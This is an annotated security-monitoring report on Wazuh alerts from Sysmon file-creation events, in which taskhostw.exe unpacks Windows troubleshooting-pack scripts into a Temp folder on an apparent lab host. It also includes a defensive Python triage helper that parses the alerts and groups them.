data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-17 16:47:59.123 ProcessGuid: {94294ddc-4855-6800-0605-000000000e00} ProcessId: 8224 Image: C:\WINDOWS\system32\taskhostw.exe TargetFilename: C:\Windows\Temp\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\DiagPackage.dll CreationUtcTime: 2025-04-17 16:47:59.123 User: Attacker\Attcker1"
Sysmon's rendered text: which account (User) and process (Image, ProcessId, ProcessGuid) created which file (TargetFilename) and when. The same values are parsed into data.win.eventdata.* below; query those rather than this string.

data.win.eventdata.utcTime:  2025-04-17 16:47:59.123
UTC time Sysmon recorded the file creation, to the millisecond. Sequence the files in this burst on this field, not on the alert timestamp.

data.win.eventdata.processGuid:  {94294ddc-4855-6800-0605-000000000e00}
Sysmon's unique ID for the creating process. Pivot on it to find that process's Event ID 1 (ProcessCreate, with command line and parent) and every other file it wrote; PIDs get reused, GUIDs do not.

data.win.eventdata.processId:  8224
PID of the process that wrote the file, meaningful only while that process is alive. Pivot on processGuid instead.

data.win.eventdata.image:  C:\\WINDOWS\\system32\\taskhostw.exe
Full path of the executable that created the file. Here taskhostw.exe, the Windows scheduled-task host: confirm it is the signed binary in System32 and identify the task it was running from this ProcessGuid's Event ID 1.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\\DiagPackage.dll
Path of the file that was created. An SDIAG_<GUID> folder under C:\Windows\Temp filling up with CL_/RS_/TS_/VF_*.ps1 and DiagPackage.dll is what Windows scripted diagnostics (troubleshooting packs) unpack, and a burst of them from taskhostw.exe is usually scheduled maintenance. Check that the folder holds only those files before closing the alert; a familiar-looking folder is also a good place to hide a dropper.

data.win.eventdata.creationUtcTime:  2025-04-17 16:47:59.123
Creation timestamp Sysmon read from the file itself. Normally equals utcTime; an older value means the file kept its original creation time (copied or moved in) or was timestomped.

data.win.eventdata.user:  Attacker\\Attcker1
Account the creating process ran as, HOST\user or DOMAIN\user. Here a local account on the host named Attacker (the domain part equals the computer name), so check which scheduled task runs in that user's context.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  6
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions
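An added triage helper for the Sysmon Event ID 11 alerts in this report: rule 92200 (the "Scripting file created under Windows Temp or User folder" alerts before and after this one) and rule 92217 (this "Executable dropped in Windows root folder" alert). It is example code written for this report, not part of SOCscribe or of Wazuh's rule set. It parses the Sysmon message text from data.win.system.message, approximates the two rules' path and extension logic (an assumption, not the real rule regexes), flags the Windows scripted-diagnostics pattern seen here (taskhostw.exe unpacking CL_/RS_/TS_/VF_*.ps1 and DiagPackage.dll into C:\Windows\Temp\SDIAG_<GUID>\) as likely benign but still needing verification, and groups the burst by ProcessGuid. The sample messages are rebuilt from the six events in this report plus one constructed suspicious write; the list of legitimate diagnostic host binaries and the extension sets are assumptions to adjust to your own baseline.

```python
"""Triage helper for Wazuh alerts built on Sysmon Event ID 11 (FileCreate).
Added example, not SOCscribe or Wazuh code: rule IDs 92200/92217 and the sample
values come from the report; the rule approximations, SDIAG heuristics and the
host-binary list are this script's own assumptions."""
import ntpath
import re
from collections import defaultdict

# Sysmon EID 11 field names as they appear in the rendered message text.
EID11_FIELDS = ("RuleName", "UtcTime", "ProcessGuid", "ProcessId", "Image",
                "TargetFilename", "CreationUtcTime", "User")
_KEY_RE = re.compile(r"(?:^|(?<=\s))(" + "|".join(EID11_FIELDS) + r"):")
# Assumed approximations of the two Wazuh rules seen in the report.
SCRIPT_EXTS = {".ps1", ".psm1", ".vbs", ".vbe", ".js", ".jse", ".bat", ".cmd", ".hta", ".wsf"}
EXEC_EXTS = {".exe", ".dll", ".scr", ".sys", ".com"}
# Windows scripted-diagnostics (troubleshooting pack) layout: an SDIAG_<GUID> folder
# under C:\Windows\Temp holding CL_/RS_/TS_/VF_ PowerShell scripts and DiagPackage.*.
_SDIAG_PATH_RE = re.compile(
    r"^c:\\windows\\temp\\sdiag_[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\\[^\\]+$", re.I)
_SDIAG_FILE_RE = re.compile(r"^(?:(?:cl|rs|ts|vf)_\w+\.ps1|diagpackage\.(?:dll|diagpkg))$", re.I)
# Assumed list of binaries that legitimately unpack those folders; extend from your baseline.
_DIAG_HOSTS = {r"c:\windows\system32\taskhostw.exe", r"c:\windows\system32\msdt.exe",
               r"c:\windows\system32\sdiagnhost.exe"}

def parse_sysmon_message(message: str) -> dict:
    """Split "File created: RuleName: - UtcTime: ... User: ..." into fields.
    Values may contain spaces (UtcTime, paths), so the text between two known
    keys is the value. Prefer Wazuh's parsed data.win.eventdata.* when present:
    a TargetFilename containing " Image:" would confuse this text parser."""
    keys = list(_KEY_RE.finditer(message))
    fields = {}
    for i, m in enumerate(keys):
        end = keys[i + 1].start() if i + 1 < len(keys) else len(message)
        fields[m.group(1)] = message[m.end():end].strip()
    return fields

def match_rule(target_filename: str):
    """Return "92200", "92217" or None for a TargetFilename (assumed rule logic)."""
    low = target_filename.lower()
    ext = ntpath.splitext(low)[1]
    if ext in SCRIPT_EXTS and ("\\windows\\temp\\" in low or "\\users\\" in low):
        return "92200"  # script created under Windows Temp or a user profile
    if ext in EXEC_EXTS and low.startswith("c:\\windows\\"):
        return "92217"  # executable dropped under the Windows folder
    return None

def triage(message: str) -> dict:
    """Parse one EID 11 message and say what an analyst should do with it."""
    f = parse_sysmon_message(message)
    image, target = f.get("Image", ""), f.get("TargetFilename", "")
    rule = match_rule(target)
    verdict, reason = "no-match", "neither rule approximation matched"
    if rule:
        diag_pack = bool(_SDIAG_PATH_RE.match(target)) and \
            bool(_SDIAG_FILE_RE.match(ntpath.basename(target)))
        if diag_pack and image.lower() in _DIAG_HOSTS:
            verdict = "likely-benign"
            reason = ("scripted-diagnostics pack unpacked by a known host; confirm Image is "
                      "the signed System32 binary and the SDIAG folder holds only "
                      "TS_/RS_/VF_/CL_ scripts and DiagPackage.*")
        else:
            verdict = "investigate"
            reason = f"script or executable written to a temp/user path by {image or '?'}"
    return {"rule": rule, "verdict": verdict, "reason": reason, "image": image, "target": target,
            "process_guid": f.get("ProcessGuid", ""), "user": f.get("User", ""),
            "utc_time": f.get("UtcTime", "")}

def summarize_by_process(messages) -> dict:
    """Group hits by ProcessGuid: a rule.firedtimes burst from one process is one activity."""
    groups = defaultdict(list)
    for msg in messages:
        r = triage(msg)
        groups[r["process_guid"]].append(ntpath.basename(r["target"]))
    return dict(groups)

def build_eid11_message(utc, guid, pid, image, target, user):
    """Render a message in the exact layout of data.win.system.message above."""
    return (f"File created: RuleName: - UtcTime: {utc} ProcessGuid: {guid} ProcessId: {pid} "
            f"Image: {image} TargetFilename: {target} CreationUtcTime: {utc} User: {user}")

# Constructed input: the six events of this report, rebuilt from their field values.
SDIAG_DIR = r"C:\Windows\Temp\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92"
SAMPLE_MESSAGES = [
    build_eid11_message(utc, "{94294ddc-4855-6800-0605-000000000e00}", 8224,
                        r"C:\WINDOWS\system32\taskhostw.exe", f"{SDIAG_DIR}\\{name}",
                        r"Attacker\Attcker1")
    for utc, name in (("2025-04-17 16:47:59.099", "CL_Utility.ps1"),
                      ("2025-04-17 16:47:59.123", "DiagPackage.dll"),
                      ("2025-04-17 16:47:59.128", "RS_AdminDiagnosticHistory.ps1"),
                      ("2025-04-17 16:47:59.145", "RS_MachineWERQueue.ps1"),
                      ("2025-04-17 16:47:59.152", "RS_SyncSystemTime.ps1"),
                      ("2025-04-17 16:47:59.162", "RS_UserDiagnosticHistory.ps1"))]
# Constructed counter-example, not from the report: PowerShell writing a script into
# C:\Users\Public under the same account (ProcessGuid and PID are made up).
SUSPICIOUS_MESSAGE = build_eid11_message(
    "2025-04-17 16:52:10.001", "{94294ddc-4a1b-6800-1b06-000000000e00}", 9140,
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Users\Public\update.ps1",
    r"Attacker\Attcker1")

if __name__ == "__main__":
    for msg in SAMPLE_MESSAGES + [SUSPICIOUS_MESSAGE]:
        r = triage(msg)
        print(f"{r['rule']} {r['verdict']:<14}{ntpath.basename(r['target'])}  <- {r['image']}")
    print(summarize_by_process(SAMPLE_MESSAGES))
```

Run as a script, the six report events come out as likely-benign with the verification steps in the reason, and the constructed PowerShell write as investigate; summarize_by_process collapses the six alerts into a single ProcessGuid, which is how the rule.firedtimes burst in this report should be read. The likely-benign verdict is a triage hint, not a closure: the reason field lists what still has to be checked on the endpoint.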

Scripting file created under Windows Temp or User folder

🧠 What happened? Scripting file created under Windows Temp or User folder

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:33:01.140+0000 | 🧠 MITRE: ['Execution', 'Command and Control'] – ['Command and Scripting Interpreter', 'Ingress Tool Transfer'] [T1059] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:33:01.140+0000
When the Wazuh manager generated the alert, not when the event happened on the endpoint. The Sysmon systemTime below is a week earlier, so build the timeline on that field and treat this one as ingestion time.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Scripting file created under Windows Temp or User folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92200
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059', 'T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution', 'Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Command and Scripting Interpreter', 'Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533981.537612
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event. Microsoft-Windows-Sysmon means the Event ID and the eventdata fields follow Sysmon's schema, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that provider; {5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Sysmon's and survives a renamed service or binary, so filter on it rather than on the name.

data.win.system.eventID:  11
Sysmon Event ID 11 = FileCreate: a file was written. Sysmon numbers its events separately from the classic Security log (4624, 4688, etc.), so read the ID against the Sysmon schema.

data.win.system.version:  2
Schema version of this Event ID's payload. A new version can add or rename eventdata fields, so re-check decoders and rules when it changes.

data.win.system.level:  4
Windows event level: 4 = Information. Sysmon logs everything at this level, so it says nothing about risk; use rule.level for that.

data.win.system.task:  11
Task category. For Sysmon it mirrors the Event ID (11 = FileCreate); for classic Security events it is the audit subcategory (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:47:59.1316901Z
UTC time the endpoint wrote the event. Here 2025-04-17, a week before the alert timestamp: the event reached the manager late, and this is the time that belongs on the timeline.

data.win.system.eventRecordID:  215898
Position in the Sysmon/Operational log, incremental per host. The gaps between the alerted records in this series are events that matched no rule; pull them from the endpoint to see the whole burst.

data.win.system.processID:  3712
PID of the Sysmon service that logged the event, not of the process that created the file; that one is eventdata.processId below.

data.win.system.threadID:  4740
Thread inside the Sysmon service that wrote the record. No investigative value beyond confirming the logging process.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record came from. Microsoft-Windows-Sysmon/Operational has to be in the agent's localfile config or none of these alerts exist, so silence from a host is not evidence of quiet.

data.win.system.computer:  Attacker
Hostname Windows stamped into the event. Should equal agent.name; a mismatch means the agent was re-registered or the event was forwarded from elsewhere.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-17 16:47:59.128 ProcessGuid: {94294ddc-4855-6800-0605-000000000e00} ProcessId: 8224 Image: C:\WINDOWS\system32\taskhostw.exe TargetFilename: C:\Windows\Temp\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\RS_AdminDiagnosticHistory.ps1 CreationUtcTime: 2025-04-17 16:47:59.128 User: Attacker\Attcker1"
Sysmon's rendered text: which account (User) and process (Image, ProcessId, ProcessGuid) created which file (TargetFilename) and when. The same values are parsed into data.win.eventdata.* below; query those rather than this string.

data.win.eventdata.utcTime:  2025-04-17 16:47:59.128
UTC time Sysmon recorded the file creation, to the millisecond. Sequence the files in this burst on this field, not on the alert timestamp.

data.win.eventdata.processGuid:  {94294ddc-4855-6800-0605-000000000e00}
Sysmon's unique ID for the creating process. Pivot on it to find that process's Event ID 1 (ProcessCreate, with command line and parent) and every other file it wrote; PIDs get reused, GUIDs do not.

data.win.eventdata.processId:  8224
PID of the process that wrote the file, meaningful only while that process is alive. Pivot on processGuid instead.

data.win.eventdata.image:  C:\\WINDOWS\\system32\\taskhostw.exe
Full path of the executable that created the file. Here taskhostw.exe, the Windows scheduled-task host: confirm it is the signed binary in System32 and identify the task it was running from this ProcessGuid's Event ID 1.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\\RS_AdminDiagnosticHistory.ps1
Path of the file that was created. An SDIAG_<GUID> folder under C:\Windows\Temp filling up with CL_/RS_/TS_/VF_*.ps1 and DiagPackage.dll is what Windows scripted diagnostics (troubleshooting packs) unpack, and a burst of them from taskhostw.exe is usually scheduled maintenance. Check that the folder holds only those files before closing the alert; a familiar-looking folder is also a good place to hide a dropper.

data.win.eventdata.creationUtcTime:  2025-04-17 16:47:59.128
Creation timestamp Sysmon read from the file itself. Normally equals utcTime; an older value means the file kept its original creation time (copied or moved in) or was timestomped.

data.win.eventdata.user:  Attacker\\Attcker1
Account the creating process ran as, HOST\user or DOMAIN\user. Here a local account on the host named Attacker (the domain part equals the computer name), so check which scheduled task runs in that user's context.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  6
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Scripting file created under Windows Temp or User folder

🧠 What happened? Scripting file created under Windows Temp or User folder

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:33:01.140+0000 | 🧠 MITRE: ['Execution', 'Command and Control'] – ['Command and Scripting Interpreter', 'Ingress Tool Transfer'] [T1059] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:33:01.140+0000
When the Wazuh manager generated the alert, not when the event happened on the endpoint. The Sysmon systemTime below is a week earlier, so build the timeline on that field and treat this one as ingestion time.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Scripting file created under Windows Temp or User folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92200
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059', 'T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution', 'Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Command and Scripting Interpreter', 'Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533981.540307
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event. Microsoft-Windows-Sysmon means the Event ID and the eventdata fields follow Sysmon's schema, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that provider; {5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Sysmon's and survives a renamed service or binary, so filter on it rather than on the name.

data.win.system.eventID:  11
Sysmon Event ID 11 = FileCreate: a file was written. Sysmon numbers its events separately from the classic Security log (4624, 4688, etc.), so read the ID against the Sysmon schema.

data.win.system.version:  2
Schema version of this Event ID's payload. A new version can add or rename eventdata fields, so re-check decoders and rules when it changes.

data.win.system.level:  4
Windows event level: 4 = Information. Sysmon logs everything at this level, so it says nothing about risk; use rule.level for that.

data.win.system.task:  11
Task category. For Sysmon it mirrors the Event ID (11 = FileCreate); for classic Security events it is the audit subcategory (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:47:59.1463736Z
UTC time the endpoint wrote the event. Here 2025-04-17, a week before the alert timestamp: the event reached the manager late, and this is the time that belongs on the timeline.

data.win.system.eventRecordID:  215900
Position in the Sysmon/Operational log, incremental per host. The gaps between the alerted records in this series are events that matched no rule; pull them from the endpoint to see the whole burst.

data.win.system.processID:  3712
PID of the Sysmon service that logged the event, not of the process that created the file; that one is eventdata.processId below.

data.win.system.threadID:  4740
Thread inside the Sysmon service that wrote the record. No investigative value beyond confirming the logging process.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record came from. Microsoft-Windows-Sysmon/Operational has to be in the agent's localfile config or none of these alerts exist, so silence from a host is not evidence of quiet.

data.win.system.computer:  Attacker
Hostname Windows stamped into the event. Should equal agent.name; a mismatch means the agent was re-registered or the event was forwarded from elsewhere.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-17 16:47:59.145 ProcessGuid: {94294ddc-4855-6800-0605-000000000e00} ProcessId: 8224 Image: C:\WINDOWS\system32\taskhostw.exe TargetFilename: C:\Windows\Temp\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\RS_MachineWERQueue.ps1 CreationUtcTime: 2025-04-17 16:47:59.145 User: Attacker\Attcker1"
Sysmon's rendered text: which account (User) and process (Image, ProcessId, ProcessGuid) created which file (TargetFilename) and when. The same values are parsed into data.win.eventdata.* below; query those rather than this string.

data.win.eventdata.utcTime:  2025-04-17 16:47:59.145
UTC time Sysmon recorded the file creation, to the millisecond. Sequence the files in this burst on this field, not on the alert timestamp.

data.win.eventdata.processGuid:  {94294ddc-4855-6800-0605-000000000e00}
Sysmon's unique ID for the creating process. Pivot on it to find that process's Event ID 1 (ProcessCreate, with command line and parent) and every other file it wrote; PIDs get reused, GUIDs do not.

data.win.eventdata.processId:  8224
PID of the process that wrote the file, meaningful only while that process is alive. Pivot on processGuid instead.

data.win.eventdata.image:  C:\\WINDOWS\\system32\\taskhostw.exe
Full path of the executable that created the file. Here taskhostw.exe, the Windows scheduled-task host: confirm it is the signed binary in System32 and identify the task it was running from this ProcessGuid's Event ID 1.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\\RS_MachineWERQueue.ps1
Path of the file that was created. An SDIAG_<GUID> folder under C:\Windows\Temp filling up with CL_/RS_/TS_/VF_*.ps1 and DiagPackage.dll is what Windows scripted diagnostics (troubleshooting packs) unpack, and a burst of them from taskhostw.exe is usually scheduled maintenance. Check that the folder holds only those files before closing the alert; a familiar-looking folder is also a good place to hide a dropper.

data.win.eventdata.creationUtcTime:  2025-04-17 16:47:59.145
Creation timestamp Sysmon read from the file itself. Normally equals utcTime; an older value means the file kept its original creation time (copied or moved in) or was timestomped.

data.win.eventdata.user:  Attacker\\Attcker1
Account the creating process ran as, HOST\user or DOMAIN\user. Here a local account on the host named Attacker (the domain part equals the computer name), so check which scheduled task runs in that user's context.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  6
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Scripting file created under Windows Temp or User folder

🧠 What happened? Scripting file created under Windows Temp or User folder

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:33:01.177+0000 | 🧠 MITRE: ['Execution', 'Command and Control'] – ['Command and Scripting Interpreter', 'Ingress Tool Transfer'] [T1059] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:33:01.177+0000
When the Wazuh manager generated the alert, not when the event happened on the endpoint. The Sysmon systemTime below is a week earlier, so build the timeline on that field and treat this one as ingestion time.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Scripting file created under Windows Temp or User folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92200
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059', 'T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution', 'Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Command and Scripting Interpreter', 'Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533981.542974
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event. Microsoft-Windows-Sysmon means the Event ID and the eventdata fields follow Sysmon's schema, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that provider; {5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Sysmon's and survives a renamed service or binary, so filter on it rather than on the name.

data.win.system.eventID:  11
Sysmon Event ID 11 = FileCreate: a file was written. Sysmon numbers its events separately from the classic Security log (4624, 4688, etc.), so read the ID against the Sysmon schema.

data.win.system.version:  2
Schema version of this Event ID's payload. A new version can add or rename eventdata fields, so re-check decoders and rules when it changes.

data.win.system.level:  4
Windows event level: 4 = Information. Sysmon logs everything at this level, so it says nothing about risk; use rule.level for that.

data.win.system.task:  11
Task category. For Sysmon it mirrors the Event ID (11 = FileCreate); for classic Security events it is the audit subcategory (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:47:59.1541658Z
UTC time the endpoint wrote the event. Here 2025-04-17, a week before the alert timestamp: the event reached the manager late, and this is the time that belongs on the timeline.

data.win.system.eventRecordID:  215902
Position in the Sysmon/Operational log, incremental per host. The gaps between the alerted records in this series are events that matched no rule; pull them from the endpoint to see the whole burst.

data.win.system.processID:  3712
PID of the Sysmon service that logged the event, not of the process that created the file; that one is eventdata.processId below.

data.win.system.threadID:  4740
Thread inside the Sysmon service that wrote the record. No investigative value beyond confirming the logging process.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record came from. Microsoft-Windows-Sysmon/Operational has to be in the agent's localfile config or none of these alerts exist, so silence from a host is not evidence of quiet.

data.win.system.computer:  Attacker
Hostname Windows stamped into the event. Should equal agent.name; a mismatch means the agent was re-registered or the event was forwarded from elsewhere.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-17 16:47:59.152 ProcessGuid: {94294ddc-4855-6800-0605-000000000e00} ProcessId: 8224 Image: C:\WINDOWS\system32\taskhostw.exe TargetFilename: C:\Windows\Temp\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\RS_SyncSystemTime.ps1 CreationUtcTime: 2025-04-17 16:47:59.152 User: Attacker\Attcker1"
Sysmon's rendered text: which account (User) and process (Image, ProcessId, ProcessGuid) created which file (TargetFilename) and when. The same values are parsed into data.win.eventdata.* below; query those rather than this string.

data.win.eventdata.utcTime:  2025-04-17 16:47:59.152
UTC time Sysmon recorded the file creation, to the millisecond. Sequence the files in this burst on this field, not on the alert timestamp.

data.win.eventdata.processGuid:  {94294ddc-4855-6800-0605-000000000e00}
Sysmon's unique ID for the creating process. Pivot on it to find that process's Event ID 1 (ProcessCreate, with command line and parent) and every other file it wrote; PIDs get reused, GUIDs do not.

data.win.eventdata.processId:  8224
PID of the process that wrote the file, meaningful only while that process is alive. Pivot on processGuid instead.

data.win.eventdata.image:  C:\\WINDOWS\\system32\\taskhostw.exe
Full path of the executable that created the file. Here taskhostw.exe, the Windows scheduled-task host: confirm it is the signed binary in System32 and identify the task it was running from this ProcessGuid's Event ID 1.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\\RS_SyncSystemTime.ps1
Path of the file that was created. An SDIAG_<GUID> folder under C:\Windows\Temp filling up with CL_/RS_/TS_/VF_*.ps1 and DiagPackage.dll is what Windows scripted diagnostics (troubleshooting packs) unpack, and a burst of them from taskhostw.exe is usually scheduled maintenance. Check that the folder holds only those files before closing the alert; a familiar-looking folder is also a good place to hide a dropper.

data.win.eventdata.creationUtcTime:  2025-04-17 16:47:59.152
Creation timestamp Sysmon read from the file itself. Normally equals utcTime; an older value means the file kept its original creation time (copied or moved in) or was timestomped.

data.win.eventdata.user:  Attacker\\Attcker1
Account the creating process ran as, HOST\user or DOMAIN\user. Here a local account on the host named Attacker (the domain part equals the computer name), so check which scheduled task runs in that user's context.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  6
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Scripting file created under Windows Temp or User folder

🧠 What happened? Scripting file created under Windows Temp or User folder

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:33:01.195+0000 | 🧠 MITRE: ['Execution', 'Command and Control'] – ['Command and Scripting Interpreter', 'Ingress Tool Transfer'] [T1059] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:33:01.195+0000
When the Wazuh manager generated the alert, not when the event happened on the endpoint. The Sysmon systemTime below is a week earlier, so build the timeline on that field and treat this one as ingestion time.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Scripting file created under Windows Temp or User folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92200
